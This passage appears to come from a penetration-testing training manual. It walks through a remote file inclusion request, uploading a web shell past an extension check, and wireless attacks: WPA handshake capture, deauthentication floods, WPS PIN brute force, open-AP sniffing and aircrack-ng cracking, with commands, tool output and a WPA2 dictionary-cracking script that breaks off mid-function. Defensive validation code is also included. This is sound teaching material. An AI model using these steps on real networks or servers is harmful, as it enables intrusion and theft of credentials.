User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.6/index.php?page=text-file-viewer.php
Cookie: PHPSESSID=amd6v7n5cp0mjjacnvati1mae0; showhints=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

textfile=https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2Fwww.textfiles.com%2Fhacking%2Fbackdoor.txt&text-file-viewer-php-submit-button=View+File

We will change the textfile parameter to point to a file of our choosing, http://www.textfiles.com/100/ad.txt. We
get the following output.
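As an added example (not the manual's or the target application's code), here is how the page and textfile parameters from the two sections above could be handled so that neither local traversal nor remote inclusion gets through, plus a small check a defender can run over logged parameter values. The pages directory, the allowlist of pages and the trusted host are assumptions.

```python
import os
from urllib.parse import urlsplit

# Assumed layout (constructed): includable pages live under PAGES_DIR and are named in
# ALLOWED_PAGES; the text file viewer may only fetch from TRUSTED_HOSTS.
PAGES_DIR = "/var/www/app/pages"
ALLOWED_PAGES = frozenset({"login.php", "dns-lookup.php", "text-file-viewer.php"})
TRUSTED_HOSTS = frozenset({"www.textfiles.com"})


def resolve_page(page_param, pages_dir=PAGES_DIR, allowed=ALLOWED_PAGES):
    """Safe handling of index.php?page=...: an allowlist decides, and a realpath check
    guarantees the final path is inside pages_dir even if the allowlist is misconfigured.
    Returns the absolute path to include, or None when the request must be refused."""
    if page_param not in allowed:
        return None
    root = os.path.realpath(pages_dir)
    candidate = os.path.realpath(os.path.join(root, page_param))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def resolve_text_file(textfile_param, trusted=TRUSTED_HOSTS):
    """Validation for the text file viewer's textfile value before anything is fetched:
    only http(s) URLs on a trusted host pass, so file://, php:// and attacker-controlled
    hosts are all refused. Returns the URL to fetch, or None."""
    parts = urlsplit(textfile_param)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    if parts.hostname.lower() not in trusted:
        return None
    return parts.geturl()


# Plain and URL-encoded spellings of dot-dot-slash seen in parameter values (constructed).
TRAVERSAL_MARKERS = ("../", "..\\", "%2e%2e%2f", "%2e%2e/", "..%2f", "%2e%2e%5c", "..%5c")


def looks_like_traversal(value):
    """Log review helper: flag a parameter value carrying a traversal sequence in plain or
    URL-encoded form. Lower-casing makes %2E%2E%2F match as well."""
    lowered = value.lower()
    return any(marker in lowered for marker in TRAVERSAL_MARKERS)
```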

Remote File Upload

There are various applications that allow us to upload different files. If proper security checks are
not implemented, then we can upload malicious files to the server. Go to
http://192.168.2.5/vulnerabilities/upload

We download a PHP web shell and try to upload it to the server. We download a shell from
https://r57.gen.tr/

If we try to upload it to the application we get an error.

We change the extension of the PHP shell from .php to .png.php.

Now the file uploads successfully.

Task: Your task is to find where the file was uploaded and browse to that file using the methods
we have learned in this section.
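As an added example (not the manual's or the target application's code), here is an upload check that rejects the .png.php trick by looking only at the last extension, verifying the file's magic bytes against the declared type, refusing image files that carry a PHP tag, and choosing the stored file name itself. The allowed types and the magic-byte table are assumptions.

```python
import os
import secrets

# Assumed policy (constructed): the form accepts only these image types.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def validate_upload(filename, content):
    """Return (ok, reason). Checks the last extension (so shell.png.php is 'php'), the
    content's magic bytes, and a crude scan for PHP tags, which an image never needs."""
    base = os.path.basename(filename)          # drop any directory part the client sent
    if "." not in base:
        return False, "no extension"
    ext = base.rsplit(".", 1)[1].lower()       # last extension only: 'png.php' -> 'php'
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension '{ext}' not allowed"
    if not content.startswith(MAGIC[ext]):
        return False, "content does not match declared type"
    if b"<?php" in content or b"<?=" in content:
        return False, "embedded PHP tag"
    return True, ext


def stored_name(ext):
    """Server-chosen name: the client's file name never reaches the filesystem, so a name
    can neither pick the directory nor carry a second, interpreter-triggering extension."""
    return f"{secrets.token_hex(16)}.{ext}"
```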

Module 11: Wireless Penetration Testing

Hacking Wireless with Wi-Fi Pineapple Nano

The WiFi Pineapple NANO is the latest generation wireless network auditing tool from Hak5. With
its custom, purpose-built hardware and software, the WiFi Pineapple enables users to quickly and
easily deploy advanced attacks.

Setup
First we need to set up our Pineapple device. Follow these steps:
1. Download the latest firmware for the WiFi Pineapple from
https://www.wifipineapple.com/downloads/nano/latest
2. Plug your NANO into the PC using the USB Y cable. You need to connect it to your Kali
virtual machine.
3. Wait for the LED to become solid blue, then make sure the Ethernet interface is connected.
4. Browse to 172.16.42.1:1471. Press Continue.
5. You will be prompted to press the Reset button. Press the Reset button to disable WiFi.
6. Upgrade the firmware. Use the file you downloaded previously. (If the firmware is already the
latest, this page will not be shown.) Firmware can be downloaded from
https://www.wifipineapple.com/downloads/nano/latest
7. Now set up the credentials. Enter the required information.
8. Once the setup is complete you will be redirected. Log in using the credentials you set.

Enabling Internet on WiFi Pineapple NANO

1. Disconnect the NANO from Kali Linux.
2. Download the script from http://wifipineapple.com/wp6.sh

root@kali:~# wget wifipineapple.com/wp6.sh
--2016-09-28 14:24:55-- http://wifipineapple.com/wp6.sh
Resolving wifipineapple.com (wifipineapple.com)... 54.149.31.76
Connecting to wifipineapple.com (wifipineapple.com)|54.149.31.76|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.wifipineapple.com/wp6.sh [following]
--2016-09-28 14:24:57-- http://www.wifipineapple.com/wp6.sh
Resolving www.wifipineapple.com (www.wifipineapple.com)... 74.125.133.121, 2a00:1450:400c:c09::79
Connecting to www.wifipineapple.com (www.wifipineapple.com)|74.125.133.121|:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://www.wifipineapple.com/wp6.sh [following]
--2016-09-28 14:24:58-- https://www.wifipineapple.com/wp6.sh
Connecting to www.wifipineapple.com (www.wifipineapple.com)|74.125.133.121|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/octet-stream]
Saving to: ‘wp6.sh’

wp6.sh [ <=> ] 15.26K 51.0KB/s in 0.3s

2016-09-28 14:25:01 (51.0 KB/s) - ‘wp6.sh’ saved [15622]

3. Now make the script executable:

root@kali:~# chmod a+x wp6.sh

4. Now execute the script and select Guided Setup:

root@kali:~# ./wp6.sh
Saved Settings: Share Internet connection from wlan0
to WiFi Pineapple at eth1 through default gateway 192.168.1.1
Since this is the first time running the WP6 Internet Connection Sharing
script, Guided setup is recommended to save initial configuration.
Subsequent sessions may be quickly connected using saved settings.
[C]onnect using saved settings
[G]uided setup (recommended)
[M]anual setup
[A]dvanced IP settings
[Q]uit

Step 1 of 3: Select Default Gateway

Default gateway reported as 192.168.3.1
Use the above reported default gateway? [Y/n]? y

Step 2 of 3: Select Internet Interface

Internet interface reported as eth0
Use the above reported Internet interface? [Y/n]? y

Step 3 of 3: Select WiFi Pineapple Interface

Please connect the WiFi Pineapple to this computer.
........[Checking]
Detected WiFi Pineapple on interface eth1
Use the above detected WiFi Pineapple interface? [Y/n]? y

Settings saved.
Saved Settings: Share Internet connection from eth0
to WiFi Pineapple at eth1 through default gateway 192.168.3.1

5. Re-execute the script; this time select Connect using saved settings.

Now browse to http://172.16.42.1:1471 from your Kali machine using a web browser.
Log in using the credentials you set previously.

Connecting Using SSH:

Once the WiFi Pineapple is configured you can connect to it using SSH. To connect, type the
following command in a terminal:

root@kali:~# ssh [email protected]
The authenticity of host '172.16.42.1 (172.16.42.1)' can't be established.
RSA key fingerprint is SHA256:5DHGHGo9HavNDDHVMmKA+tyKSiL8/lKqAWnPP1TgIgs.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '172.16.42.1' (RSA) to the list of known hosts.
[email protected]'s password:

The password is the one you set during the configuration process.

You can now run various commands like iwconfig:

root@Pineapple:~# iwconfig
lo        no wireless extensions.

wlan1     IEEE 802.11bgn  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

wlan0-1   IEEE 802.11bgn  Mode:Master  Tx-Power=17 dBm
          RTS thr:off   Fragment thr:off
          Power Management:off

wlan0     IEEE 802.11bgn  Mode:Master  Tx-Power=17 dBm
          RTS thr:off   Fragment thr:off
          Power Management:off

eth0      no wireless extensions.

br-lan    no wireless extensions.

Capture WPA/WPA2 Handshake

To perform a particular attack we need to install certain modules for the WiFi Pineapple. For
this attack we need to install the Site Survey module. To install new modules go to Modules ->
Manage Modules.

Click on Get Modules from WiFiPineapple.com. We need to install the Site Survey module.

Click the Install button. Install it to Internal Storage.

After installation, the module will appear under the Modules section.

Install the dependencies by clicking on the Not Installed button.

Install them on internal storage.

Before scanning we need to put our interface into monitor mode. Log in to the WiFi Pineapple using
SSH:

root@kali:~# ssh [email protected]
[email protected]'s password:

View the network interfaces:

root@Pineapple:~# iwconfig
lo        no wireless extensions.

wlan1     IEEE 802.11bgn  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

wlan0-1   IEEE 802.11bgn  Mode:Master  Tx-Power=17 dBm
          RTS thr:off   Fragment thr:off
          Power Management:off

wlan0     IEEE 802.11bgn  Mode:Master  Tx-Power=17 dBm
          RTS thr:off   Fragment thr:off
          Power Management:off

eth0      no wireless extensions.

br-lan    no wireless extensions.

We need to put wlan1 into monitor mode:

root@Pineapple:~# airmon-ng start wlan1

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

 6705 root      1376 S    grep wpa_action\|wpa_supplicant\|wpa_cli\|dhclient\|ifplugd\|dhcdbd\|dhcpcd\|udhcpc\|

PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k           Not pci, usb, or sdio
phy0    wlan0-1         ath9k           Not pci, usb, or sdio
phy1    wlan1           ath9k_htc       Atheros Communications, Inc. AR9271 802.11n
                (mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
                (mac80211 station mode vif disabled for [phy1]wlan1)

Now we can go back to the web interface and start the scan. Refresh the page and click Scan.

You will get a list of access points (APs). We want to capture the handshake of please_hack_me.

Click Capture.

Now click Deauth. The deauthentication job appears under Running Processes.

Scroll down to Captures.

Press the refresh button under Captures every so often. Capturing the handshake takes a
while, because the four-way handshake is only recorded when a client that the deauth frames
knocked off the network reconnects; an AP with no clients will never yield one. Once the WPA
Handshake column reads Yes you can stop the attacks: click Stop Deauth and Stop Capture.

We can download the capture file and run a dictionary attack against it to recover the
access point's pre-shared key. Click Download; the file is saved on your Kali machine.

Right-click the downloaded archive and choose Extract Here.

We now have a .cap file and will try to crack it with aircrack-ng. First we need a list of
candidate passwords. aircrack-ng does not brute-force the key space: for each word in the
list it derives the pairwise master key (PBKDF2-HMAC-SHA1 over the passphrase and the SSID,
4096 rounds) and checks it against the MIC in the captured handshake, so the attack only
succeeds if the real passphrase is in the list. Various lists of common passwords are
available online, or you can create your own.

Type the following command to start cracking with the passwords in our list:

root@kali:~/Documents# aircrack-ng -w password.lst capture_1475139153-01.cap

Opening capture_1475139153-01.cap
Read 20835 packets.

   #  BSSID              ESSID                     Encryption

   1  64:70:02:4E:70:5B  please_hack_me            WPA (1 handshake)

Choosing first network as target.

Opening capture_1475139153-01.cap
Reading packets, please wait...

                                 Aircrack-ng 1.2 rc4

      [00:00:00] 4/4 keys tested (984.25 k/s)

      Time left: 0 seconds                                      100.00%

                          KEY FOUND! [ testing123 ]

      Master Key     : E1 50 16 E9 D9 98 A7 CB 2F B0 65 1C 81 AC EA A1
                       A3 30 3C B5 47 CF A0 A3 E7 86 73 C6 AF FD 60 B5

      Transient Key  : 1F 8A D8 4C 16 70 10 EE 0E 0C CA B5 5A 73 3E 02
                       A7 FA A0 A5 BB 7F CC AD D8 D5 F0 F5 4A 94 F8 BA
                       CD 84 EB 63 50 A6 E8 EA 0D 77 49 BB B0 AC 75 30
                       27 BA 00 FD 78 2C 33 07 6D C3 6F 8D BD 99 6B 3C

      EAPOL HMAC     : 3B 09 53 87 A7 29 CC D5 D9 E0 72 45 F1 A3 11 02

The key was found after only 4 candidates because our list is tiny. The password is
testing123; the Master Key is the PMK derived from it and the SSID, and the Transient Key
is the per-session PTK derived from the PMK and the handshake nonces.


WPS Brute Force

We can brute-force the WPS PIN of an access point using a WiFi Pineapple module. First go
to Modules -> Manage Modules.

Click Get Modules from WiFiPineapple.com and install the wps module.


Install it to internal storage.

The newly installed module appears in the Modules section. Install its dependencies by
clicking Not Installed.

Install them on internal storage as well.


First we need a monitor interface on wlan1. Click Interfaces and select wlan1.

Click Start Monitor. A monitor interface appears.

Click Scan Results and then press the Scan button.

A list of access points is generated.


Click the SSID you want to attack. We will be attacking please_hack_me.

As soon as you click it, its details are filled in under the Options section.


Press Start. You will see a running process.

The process takes time to finish: the 8-digit PIN is verified in two halves, so at most
about 11,000 guesses are needed, but many access points rate-limit WPS or lock it after a
few failed attempts, which stretches the attack out or stops it altogether. You can stop it
by clicking Stop. Click Stop Monitor before you move on to the next attack.

Capturing Traffic

In this section we capture user traffic with the DWall module. First go to Networking.

Uncheck Hide Open AP.

Click Update Access Point. You may need to disconnect and reconnect the Pineapple to your
Kali virtual machine and run the wp6.sh script again.


Now we need to install the DWall module. Go to Modules -> Manage Modules, click Get Modules
from WiFiPineapple.com, select DWall and install the module.

Go to the DWall module.

Click Enable, then click Start Listening. The Pineapple is now advertising an open access
point.

Once a user connects and starts browsing, for example to tranchulas.com, DWall displays what
the client sends in the clear: requested URLs, cookies and images. Only plaintext HTTP is
readable this way; traffic to HTTPS sites is not decrypted, and for those connections the
most the listener sees is the destination host name.
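To make that difference concrete, here is an added example (not the DWall module's code)
that parses two constructed client payloads of the kind an open access point exposes: a
plaintext HTTP login request and a TLS ClientHello. The HTTP request gives up the full URL,
the session cookie and the POSTed credentials; the TLS record gives up only the server name
carried in the SNI extension, because everything after the handshake is encrypted. The host
name, cookie value and credentials in the samples are made up, and the ClientHello is built
with a single cipher suite and one extension (real browsers send many more, which the parser
skips the same way).

```python
"""What a sniffer on an open access point actually sees.

Added example, not the DWall module's code. http_request() recovers the
URL, cookie and body of a plaintext request; tls_sni() recovers only the
server name from a TLS ClientHello. Both inputs below are constructed here.
"""
import re

# Constructed plaintext login request, as a client on the open AP would send it.
HTTP_REQ = (b"POST /login HTTP/1.1\r\n"
            b"Host: www.tranchulas.com\r\n"
            b"Cookie: session=abc123\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: 27\r\n\r\n"
            b"user=alice&pass=Winter2016!")

REQUEST_LINE = re.compile(r"^[A-Z]+ \S+ HTTP/\d\.\d$")


def http_request(payload: bytes):
    """Return method, URL, cookie and body of a plaintext HTTP request, or None."""
    try:
        text = payload.decode("ascii")
    except UnicodeDecodeError:
        return None
    head, _, body = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    if not REQUEST_LINE.match(lines[0]):
        return None
    method, path, _ = lines[0].split(" ")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method,
            "url": "http://" + headers.get("host", "") + path,
            "cookie": headers.get("cookie"),
            "body": body}


def build_client_hello(hostname: str) -> bytes:
    """Constructed minimal TLS 1.2 ClientHello carrying only an SNI extension."""
    name = hostname.encode()
    entry = b"\x00" + len(name).to_bytes(2, "big") + name   # name_type host_name
    sni = len(entry).to_bytes(2, "big") + entry              # server_name list
    ext = b"\x00\x00" + len(sni).to_bytes(2, "big") + sni    # extension type 0
    body = (b"\x03\x03" + bytes(32) + b"\x00"     # version, random, empty session id
            + b"\x00\x02\x13\x01"                 # one cipher suite
            + b"\x01\x00"                         # null compression only
            + len(ext).to_bytes(2, "big") + ext)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + len(handshake).to_bytes(2, "big") + handshake


def tls_sni(payload: bytes):
    """Return the SNI host name from a TLS ClientHello, or None for anything else."""
    if len(payload) < 44 or payload[0] != 0x16 or payload[5] != 0x01:
        return None
    try:
        p = 9 + 2 + 32                                     # record+handshake hdr, version, random
        p += 1 + payload[p]                                # session id
        p += 2 + int.from_bytes(payload[p:p + 2], "big")   # cipher suites
        p += 1 + payload[p]                                # compression methods
        if p + 2 > len(payload):
            return None                                    # no extensions at all
        end = p + 2 + int.from_bytes(payload[p:p + 2], "big")
        p += 2
        while p + 4 <= end:
            ext_type = int.from_bytes(payload[p:p + 2], "big")
            ext_len = int.from_bytes(payload[p + 2:p + 4], "big")
            p += 4
            if ext_type == 0 and payload[p + 2] == 0:      # server_name, host_name entry
                name_len = int.from_bytes(payload[p + 3:p + 5], "big")
                return payload[p + 5:p + 5 + name_len].decode("ascii", "replace")
            p += ext_len
    except IndexError:
        return None
    return None


def summarise(payload: bytes) -> dict:
    """Classify one client payload and report what an on-path listener learns from it."""
    req = http_request(payload)
    if req:
        return {"kind": "http", **req}
    sni = tls_sni(payload)
    if sni:
        return {"kind": "tls", "server": sni}
    return {"kind": "opaque"}


if __name__ == "__main__":
    for sample in (HTTP_REQ, build_client_hello("www.tranchulas.com")):
        print(summarise(sample))
```

Run it and the HTTP sample yields the URL, cookie and the credentials in the body, while the
TLS sample yields nothing but the server name; that is the whole of what an open-AP sniffer
gets from a well-configured HTTPS site.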


Airodump-ng
Airodump-ng captures raw 802.11 frames and is particularly suited to collecting WEP IVs
(initialization vectors) and WPA handshakes for later use with Aircrack-ng. If a GPS
receiver is connected to the computer, Airodump-ng can log the coordinates of the APs it
finds.
Usage
Before running Airodump-ng, start the Airmon-ng script to list the detected wireless
interfaces and put one into monitor mode.

Usage: airodump-ng <options> <interface>[,<interface>,...]

Options:

--ivs: Save only captured IVs
--gpsd: Use GPSd
--write <prefix>: Dump file prefix
-w: same as --write
--beacons: Record all beacons in dump file
--update <secs>: Display update delay in seconds

Filter options:

--encrypt <suite>: Filter APs by cipher suite
--bssid <bssid>: Filter APs by BSSID
--essid <essid>: Filter APs by ESSID
-a: Filter unassociated clients

By default, airodump-ng hops across the 2.4 GHz channels, so a handshake on a single channel
can be missed while the card is elsewhere. You can make it capture on other or specific
channels with:

--channel <channels>: Capture on specific channels
--band <abg>: Band on which airodump-ng should hop

Aireplay-ng
Aireplay-ng is primarily used to generate or accelerate traffic for later use with
Aircrack-ng (for cracking WEP and WPA-PSK keys). Aireplay-ng supports various attacks such
as deauthentication (to force a WPA handshake that can be captured), fake authentication,
interactive packet replay, hand-crafted ARP request injection and ARP request reinjection.
These are the attack names and their corresponding numbers:

• Attack 0: Deauthentication
• Attack 1: Fake authentication
• Attack 2: Interactive packet replay
• Attack 3: ARP request replay attack
• Attack 4: KoreK chopchop attack
• Attack 5: Fragmentation attack
• Attack 9: Injection test
Usage
This section provides a general usage overview. Not all options apply to all attacks; see
the command options of the specific attack for the relevant details.
Usage: aireplay-ng <options> <replay interface>
For all attacks except deauthentication and fake authentication you may use the following
filters to limit the packets that are presented to the particular attack. The most


commonly used filter option is -b, which singles out a specific AP. Typically only the -b
option is used.
Filter options:

• -b BSSID : MAC address, Access Point
• -d dmac : MAC address, Destination
• -s smac : MAC address, Source
• -m len : minimum packet length
• -n len : maximum packet length
• -u type : frame control, type field
• -v subtype : frame control, subtype field
• -t tods : frame control, To DS bit
• -f fromds : frame control, From DS bit
• -w iswep : frame control, WEP bit
When replaying (injecting) packets, the following options apply:
Replay options:

• -x nbpps : number of packets per second
• -p fctrl : set frame control word (hex)
• -a BSSID : set Access Point MAC address
• -c dmac : set Destination MAC address
• -h smac : set Source MAC address
• -e essid : fakeauth attack : set target AP SSID
• -j : arpreplay attack : inject FromDS pkts
• -g value : change ring buffer size (default: 8)
• -k IP : set destination IP in fragments
• -l IP : set source IP in fragments
• -o npckts : number of packets per burst (-1)
• -q sec : seconds between keep-alives (-1)
• -y prga : keystream for shared key auth
The Aireplay attacks can obtain packets to replay from two sources. The first is a live
flow of packets from your wireless card. The second is a pre-captured pcap file. The
standard pcap format (Packet CAPture, associated with the libpcap library,
http://www.tcpdump.org) is recognized by most commercial and open-source traffic capture and
analysis tools. Reading from a file is an often overlooked feature of Aireplay-ng; it lets
you replay packets from other capture sessions.
Source options:

• -i iface : capture packets from this interface



• -r file : extract packets from this pcap file

You can specify the attack mode using the following syntax (the numbers can still be used):

• --deauth count : deauthenticate 1 or all stations (-0)
• --fakeauth delay : fake authentication with AP (-1)
• --interactive : interactive frame selection (-2)
• --arpreplay : standard ARP-request replay (-3)
• --chopchop : decrypt/chopchop WEP packet (-4)
• --fragment : generates valid keystream (-5)
• --test : injection test (-9)

Demo Attack

For this section you need an external WiFi adapter whose driver supports monitor mode and
packet injection. We are using an Alfa AWUS036NEH for these tests.

First we need to attach the external WiFi card to our virtual machine.


Open a terminal and type iwconfig:

root@kali:~# iwconfig
wlan0     IEEE 802.11bgn  ESSID:"Tranchulas-Cisco"
          Mode:Managed  Frequency:2.412 GHz  Access Point: 00:23:69:19:3A:57
          Bit Rate=1 Mb/s   Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=70/70  Signal level=-19 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:1  Invalid misc:9   Missed beacon:0

lo        no wireless extensions.

eth0      no wireless extensions.

You should see a wlan0 interface. Now we need to put it into monitor mode.

root@kali:~# airmon-ng start wlan0

Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  593 NetworkManager
  771 dhclient
 1031 wpa_supplicant
 3732 dhclient

PHY	Interface	Driver		Chipset

phy0	wlan0		rt2800usb	Ralink Technology, Corp. RT2870/RT3070

		(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
		(mac80211 station mode vif disabled for [phy0]wlan0)

Unlike on the Pineapple, the processes flagged here are real: NetworkManager and
wpa_supplicant can switch the card's channel or mode underneath you. If the capture stalls,
run airmon-ng check kill as suggested and start again.

Type iwconfig again. We should now see a wlan0mon interface:

root@kali:~# iwconfig
wlan0mon  IEEE 802.11bgn  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

lo        no wireless extensions.

eth0      no wireless extensions.

To list all access points in range, type airodump-ng wlan0mon:

root@kali:~# airodump-ng wlan0mon

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:23:69:19:3A:57  -22       18        0    0   1  54e  WPA2 CCMP   PSK  Tranchulas-Cisco
 34:BF:90:D1:8E:08  -30        8        0    0  12  54e  WPA2 CCMP   PSK  04F2G_d18e08
 D4:F9:A1:9F:E4:72  -35       12       55    3   1  54e. WPA2 CCMP   PSK  Tranchulas 2
 64:70:02:4E:70:5B  -35       15        0    0  11  54e  WPA2 CCMP   PSK  please_hack_me

Press Ctrl+C to exit.

We are interested in the please_hack_me access point with BSSID 64:70:02:4E:70:5B on
channel 11. We will now focus on this AP:

root@kali:~# airodump-ng wlan0mon --bssid 64:70:02:4E:70:5B -c 11 --write cracking_wifi

-c is the channel, --bssid is the BSSID of the AP and --write writes all captured data to
files with the prefix cracking_wifi. Pinning the channel matters: with channel hopping the
card would be elsewhere for most of the time and could miss the handshake. airodump-ng now
captures the AP's traffic and waits for a handshake.


At the same time, in a second terminal, we launch a deauthentication attack to disconnect
any clients connected to this AP. Deauth frames are unauthenticated management frames, so the
AP and clients accept them from anyone; when the clients reconnect, they perform a fresh
four-way handshake that airodump-ng captures.

root@kali:~# aireplay-ng --deauth 100 -a 64:70:02:4E:70:5B wlan0mon

12:59:18  Waiting for beacon frame (BSSID: 64:70:02:4E:70:5B) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
12:59:18  Sending DeAuth to broadcast -- BSSID: [64:70:02:4E:70:5B]
12:59:19  Sending DeAuth to broadcast -- BSSID: [64:70:02:4E:70:5B]
12:59:19  Sending DeAuth to broadcast -- BSSID: [64:70:02:4E:70:5B]
12:59:20  Sending DeAuth to broadcast -- BSSID: [64:70:02:4E:70:5B]
12:59:20  Sending DeAuth to broadcast -- BSSID: [64:70:02:4E:70:5B]
12:59:21  Sending DeAuth to broadcast -- BSSID: [64:70:02:4E:70:5B]
12:59:21  Sending DeAuth to broadcast -- BSSID: [64:70:02:4E:70:5B]
12:59:22  Sending DeAuth to broadcast -- BSSID: [64:70:02:4E:70:5B]
12:59:22  Sending DeAuth to broadcast -- BSSID: [64:70:02:4E:70:5B]
12:59:23  Sending DeAuth to broadcast -- BSSID: [64:70:02:4E:70:5B]
12:59:23  Sending DeAuth to broadcast -- BSSID: [64:70:02:4E:70:5B]

As the tool notes, targeting one connected client with -c <client MAC> works better than
broadcasting. Stop the deauth after some time, and stop airodump-ng once its status line
shows "WPA handshake: 64:70:02:4E:70:5B". The capture is in cracking_wifi-01.cap.

Now we will try to crack the password with aircrack-ng, reusing the password list we created
in the WiFi Pineapple section.


root@kali:~# aircrack-ng cracking_wifi-01.cap -w /root/Documents/password.lst

Opening cracking_wifi-01.cap
Read 164176 packets.

   #  BSSID              ESSID                     Encryption

   1  64:70:02:4E:70:5B  please_hack_me            WPA (1 handshake)

Choosing first network as target.

Opening cracking_wifi-01.cap
Reading packets, please wait...

                                 Aircrack-ng 1.2 rc4

      [00:00:00] 4/4 keys tested (937.65 k/s)

      Time left: 0 seconds                                      100.00%

                          KEY FOUND! [ testing123 ]

      Master Key     : E1 50 16 E9 D9 98 A7 CB 2F B0 65 1C 81 AC EA A1
                       A3 30 3C B5 47 CF A0 A3 E7 86 73 C6 AF FD 60 B5

      Transient Key  : EE F5 07 C5 9B B8 A1 83 1B 75 95 56 1E C9 32 CE
                       67 C1 A0 39 F9 C5 E2 7F 75 33 17 8F 10 83 E7 A9
                       13 32 D9 9D A6 76 36 B1 58 5F A1 EB F5 8E A2 E7
                       58 33 42 93 4B 23 69 6A A3 88 C9 13 13 C1 55 9F

      EAPOL HMAC     : C8 7C C6 A7 BC F1 A1 99 0C 9B FC CE D7 FE 19 9E

The password is testing123. Note that the Master Key is identical to the one recovered from
the Pineapple capture, because it depends only on the passphrase and the SSID, while the
Transient Key differs, because it also depends on the nonces of this particular handshake.

The cracking process takes time in proportion to the size of the password list and in
inverse proportion to how fast your hardware can run PBKDF2; the 4096-round derivation is
what keeps WPA-PSK cracking slow compared with a plain hash.
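The check aircrack-ng performs for each word in the list, both for the Pineapple capture
above and for this airodump-ng capture, as an added example (this is not aircrack-ng's code):
derive the PMK from the candidate passphrase and the SSID, expand it to the PTK with the two
MAC addresses and the two nonces from the handshake, and recompute the MIC of EAPOL message 2
with the KCK. The "Master Key" aircrack-ng prints is that PMK, the "Transient Key" is the PTK
and the "EAPOL HMAC" is the MIC. It assumes WPA2 with CCMP (key descriptor version 2, HMAC-
SHA1), which matches the airodump-ng listing for please_hack_me. The BSSID and ESSID are
taken from the capture, but the client MAC, nonces and EAPOL frame are constructed inside the
script rather than read from cracking_wifi-01.cap, so it runs offline.

```python
"""Dictionary attack against a captured WPA2-PSK four-way handshake.

Added example, not aircrack-ng's code. For every candidate passphrase it
repeats the check aircrack-ng makes: PMK = PBKDF2(passphrase, SSID),
PTK = PRF-512(PMK, MACs and nonces), MIC = HMAC-SHA1-128(KCK, EAPOL msg 2).
A candidate is correct when the recomputed MIC equals the captured one.
"""
import hashlib
import hmac
from typing import Optional

SSID = "please_hack_me"                 # ESSID from the capture on the page
BSSID = bytes.fromhex("6470024E705B")   # AP MAC from the capture on the page
MIC_OFFSET = 81   # EAPOL header (4 bytes) + key descriptor fields before the 16-byte MIC


def pmk(passphrase: str, ssid: str) -> bytes:
    """PBKDF2-HMAC-SHA1, 4096 rounds, 32 bytes: aircrack-ng's 'Master Key'."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:64]


def ptk(pmk_bytes: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise transient key (aircrack-ng's 'Transient Key'); the KCK is its first 16 bytes."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk_bytes, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the EAPOL-Key frame
    with its MIC field zeroed, truncated to 16 bytes (aircrack-ng's 'EAPOL HMAC').
    WPA/TKIP (version 1) would use HMAC-MD5 here instead."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(handshake: dict, wordlist) -> Optional[str]:
    """Return the first candidate whose derived KCK reproduces the captured MIC."""
    for candidate in wordlist:
        candidate = candidate.strip()
        if not 8 <= len(candidate) <= 63:      # WPA-PSK passphrases are 8..63 characters
            continue
        key = ptk(pmk(candidate, handshake["ssid"]), handshake["aa"], handshake["spa"],
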